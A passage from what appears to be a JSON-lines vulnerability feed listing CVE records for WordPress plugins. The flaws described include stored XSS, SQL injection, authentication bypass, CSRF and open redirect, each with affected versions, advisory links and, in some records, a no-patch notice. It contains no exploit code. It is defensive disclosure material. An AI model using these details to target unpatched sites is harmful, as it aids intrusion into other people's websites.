tags\":[]}]"}
{"CVE_ID":"CVE-2024-9051","slug":"wp-ultimate-post-grid","versionImpact":"3.9.3","description":"The WP Ultimate Post Grid plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpupg-grid-with-filters shortcode in all versions up to, and including, 3.9.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3154a7a-b8b3-490b-9822-b3a92d1b4fef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3154a7a-b8b3-490b-9822-b3a92d1b4fef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-ultimate-post-grid\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-ultimate-post-grid\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-post-grid\\\/trunk\\\/includes\\\/public\\\/class-wpupg-shortcode.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-post-grid\\\/trunk\\\/includes\\\/public\\\/class-wpupg-shortcode.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-post-grid\\\/trunk\\\/includes\\\/public\\\/class-wpupg-blocks.php#L142\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-ultimate-post-grid\\\/trunk\\\/includes\\\/public\\\/class-wpupg-blocks.php#L142\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166429\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3166429\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11036","slug":"gamipress","versionImpact":"7.1.5","description":"The The GamiPress \u2013 The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution via gamipress_get_user_earnings AJAX action in all versions up to, and including, 7.1.5. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bad0cd3f-88ea-4a1d-b400-0a450b07a546?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bad0cd3f-88ea-4a1d-b400-0a450b07a546?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/tags\\\/7.1.4\\\/includes\\\/functions.php#L693\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/tags\\\/7.1.4\\\/includes\\\/functions.php#L693\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/tags\\\/7.1.4\\\/includes\\\/functions.php#L702\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/tags\\\/7.1.4\\\/includes\\\/functions.php#L702\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gamipress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/gamipress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gamipress\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8679","slug":"library-management-system","versionImpact":"3.0.0","description":"The Library Management System \u2013 Manage e-Digital Books Library plugin for WordPress is vulnerable to SQL Injection via the \u2018value' parameter of the owt_lib_handler AJAX action in all versions up to, and including, 3.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/library-management-system\\\/trunk\\\/admin\\\/class-library-management-system-admin.php#L2092\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/library-management-system\\\/trunk\\\/admin\\\/class-library-management-system-admin.php#L2092\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee792903-3b55-4f1d-bba1-59ea3f1826a1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ee792903-3b55-4f1d-bba1-59ea3f1826a1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0897","slug":"modal-window","versionImpact":"6.1.5","description":"The Modal Window \u2013 create popup modal window plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'iframeBox' shortcode in all versions up to, and including, 6.1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/modal-window\\\/trunk\\\/public\\\/class-shortcodes.php#L70\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/modal-window\\\/trunk\\\/public\\\/class-shortcodes.php#L70\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243077\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243077\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/modal-window\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/modal-window\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de4dfcc7-fcc0-46e5-8452-98783007368d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de4dfcc7-fcc0-46e5-8452-98783007368d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5538","slug":"bns-featured-category","versionImpact":"2.8.2","description":"The BNS Featured Category plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bnsfc' shortcode in all versions up to, and including, 2.8.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bns-featured-category\\\/trunk\\\/bns-featured-category.php#L1060\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bns-featured-category\\\/trunk\\\/bns-featured-category.php#L1060\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9a9bec8-7a76-4819-91c7-d9fdae3d94de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9a9bec8-7a76-4819-91c7-d9fdae3d94de?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4777","slug":"bootstrap-shortcodes","versionImpact":"3.4.0","description":"The Bootstrap Shortcodes WordPress plugin through 3.4.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b4c53bef-e868-46f1-965d-720b5b9a931e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b4c53bef-e868-46f1-965d-720b5b9a931e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4377","slug":"doneren-met-mollie","versionImpact":"2.8.5","description":"The Doneren met Mollie plugin for WordPress is vulnerable to Sensitive Data Exposure in versions up to, and including, 2.8.5 via the dmm_export_donations() function which is called via the admin_post_dmm_export hook due to missing capability checks. This can allow authenticated attackers to extract a CSV file that contains sensitive information about the donors.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2459548\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2459548\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/information-disclosure-vulnerability-fixed-in-wordpress-doneren-met-mollie-plugin\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/information-disclosure-vulnerability-fixed-in-wordpress-doneren-met-mollie-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36afc442-9634-498e-961e-4c935880cd2b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/36afc442-9634-498e-961e-4c935880cd2b\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed99a056-42c6-4540-950e-12f8b547b64d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed99a056-42c6-4540-950e-12f8b547b64d?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2834","slug":"bookit","versionImpact":"2.3.7","description":"The BookIt plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.3.7. This is due to insufficient verification on the user being supplied during booking an appointment through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","refs":"[{\"url\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/0dea1346-fd60-4338-8af6-6f89c29075d4\\\/\",\"name\":\"https:\\\/\\\/lana.codes\\\/lanavdb\\\/0dea1346-fd60-4338-8af6-6f89c29075d4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfd32e46-a4fc-4c10-b546-9f9da75db791?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfd32e46-a4fc-4c10-b546-9f9da75db791?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookit\\\/tags\\\/2.3.6\\\/includes\\\/classes\\\/CustomerController.php#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookit\\\/tags\\\/2.3.6\\\/includes\\\/classes\\\/CustomerController.php#L27\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2925153\\\/bookit\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2925153\\\/bookit\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookit\\\/tags\\\/2.3.6\\\/includes\\\/classes\\\/database\\\/Customers.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bookit\\\/tags\\\/2.3.6\\\/includes\\\/classes\\\/database\\\/Customers.php#L63\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2919529\\\/bookit\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2919529\\\/bookit\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2023\\\/06\\\/stylemixthemes-addresses-authentication-bypass-vulnerability-in-bookit-wordpress-plugin\\\/\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/blog\\\/2023\\\/06\\\/stylemixthemes-addresses-authentication-bypass-vulnerability-in-bookit-wordpress-plugin\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2448","slug":"userpro","versionImpact":"5.1.4","description":"The UserPro plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'userpro_shortcode_template' function in versions up to, and including, 5.1.4. This makes it possible for unauthenticated attackers to arbitrary shortcode execution. An attacker can leverage CVE-2023-2446 to get sensitive information via shortcode.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cbe9175-4a6f-4eb6-8d31-9a9fda9b4f40?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cbe9175-4a6f-4eb6-8d31-9a9fda9b4f40?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0698","slug":"easyappointments","versionImpact":"1.3.1","description":"The Easy!Appointments plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b002e40-712d-4c3f-b168-9132e7b77e60?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4b002e40-712d-4c3f-b168-9132e7b77e60?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easyappointments\\\/trunk\\\/public\\\/class-easyappointments-public.php#L141\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easyappointments\\\/trunk\\\/public\\\/class-easyappointments-public.php#L141\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2468","slug":"embedpress","versionImpact":"3.9.12","description":"The EmbedPress \u2013 Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps & Embed Any Documents in Gutenberg & Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the EmbedPress widget 'embedpress_pro_twitch_theme ' attribute in all versions up to, and including, 3.9.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce3f1310-4d2e-45aa-a3ee-3972a6a31c2e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce3f1310-4d2e-45aa-a3ee-3972a6a31c2e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3055856%40embedpress&new=3055856%40embedpress&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3055856%40embedpress&new=3055856%40embedpress&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0893","slug":"schema-app-structured-data-for-schemaorg","versionImpact":"2.1.0","description":"The Schema App Structured Data plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the MarkupUpdate function in all versions up to, and including, 2.1.0. This makes it possible for authenticated attackers, with subscriber access or higher, to update or delete post metadata.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1089ab17-b780-4840-8dcd-c50258513634?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1089ab17-b780-4840-8dcd-c50258513634?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/schema-app-structured-data-for-schemaorg\\\/trunk\\\/lib\\\/SchemaEditor.php#L327\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/schema-app-structured-data-for-schemaorg\\\/trunk\\\/lib\\\/SchemaEditor.php#L327\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3925","slug":"bdthemes-element-pack-lite","versionImpact":"5.6.7","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Creative Button widget in all versions up to, and including, 5.6.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/263dd246-32ed-4efc-b7a6-ee6c9d305f89?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/263dd246-32ed-4efc-b7a6-ee6c9d305f89?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bdthemes-element-pack-lite\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bdthemes-element-pack-lite\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5880","slug":"hide-my-site","versionImpact":"2.2","description":"The Hide My Site plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2 due to the plugin not restricting access to the REST API when password protection is enabled. This makes it possible for unauthenticated attackers to gain unauthorized access to the site.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31d2ccd2-d38b-4bdf-a905-a2b54ca80a58?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31d2ccd2-d38b-4bdf-a905-a2b54ca80a58?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hide-my-site\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/hide-my-site\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11098","slug":"svg-block","versionImpact":"1.1.24","description":"The SVG Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.1.24 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79cc1f11-9b53-4e71-b0cc-8f8ebd4a5f32?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/79cc1f11-9b53-4e71-b0cc-8f8ebd4a5f32?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svg-block\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/svg-block\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188270\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188270\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13888","slug":"wpappninja","versionImpact":"11.56","description":"The WPMobile.App plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 11.56. This is due to insufficient validation on the redirect URL supplied via the 'redirect' parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243366\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243366\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpappninja\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpappninja\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a139f0fc-f3e0-4759-aa8d-ba138e5ccc87?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a139f0fc-f3e0-4759-aa8d-ba138e5ccc87?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5536","slug":"wp-freemind","versionImpact":"1.0","description":"The Freemind Viewer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'freemind' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-freemind\\\/trunk\\\/wp-freemind.php#L36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-freemind\\\/trunk\\\/wp-freemind.php#L36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70eaf9b8-67a0-4e98-b65c-aea61b20b448?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/70eaf9b8-67a0-4e98-b65c-aea61b20b448?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4764","slug":"simple-file-downloader","versionImpact":"1.0.4","description":"The Simple File Downloader WordPress plugin through 1.0.4 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/788c6aa2-14cc-411f-95e8-5994f8c82d70\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/788c6aa2-14cc-411f-95e8-5994f8c82d70\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4376","slug":"woo-multi-currency","versionImpact":"2.1.17.","description":"The WooCommerce Multi Currency plugin for WordPress is vulnerable to Missing Authorization  in versions up to, and including, 2.1.17. This makes it possible for authenticated attackers to change the price of a product to an arbitrary value.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8a490c6-14c1-4c71-b44c-1e362cc892a8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d8a490c6-14c1-4c71-b44c-1e362cc892a8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/480125bc-bab3-45b8-9325-a4d406655a61\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/480125bc-bab3-45b8-9325-a4d406655a61\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2734576%40woo-multi-currency&new=2734576%40woo-multi-currency&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2734576%40woo-multi-currency&new=2734576%40woo-multi-currency&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-multi-currency\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/woo-multi-currency\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4387","slug":"opal-estate","versionImpact":"1.6.11","description":"The Opal Estate plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.6.11. This is due to missing or incorrect nonce validation on the opalestate_set_feature_property() and opalestate_remove_feature_property() functions. This makes it possible for unauthenticated attackers to set and remove featured properties via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-estate\\\/trunk\\\/inc\\\/ajax-functions.php#L177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-estate\\\/trunk\\\/inc\\\/ajax-functions.php#L177\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2645899c-2b6b-48bd-8f33-2a837a951c5e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2645899c-2b6b-48bd-8f33-2a837a951c5e?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
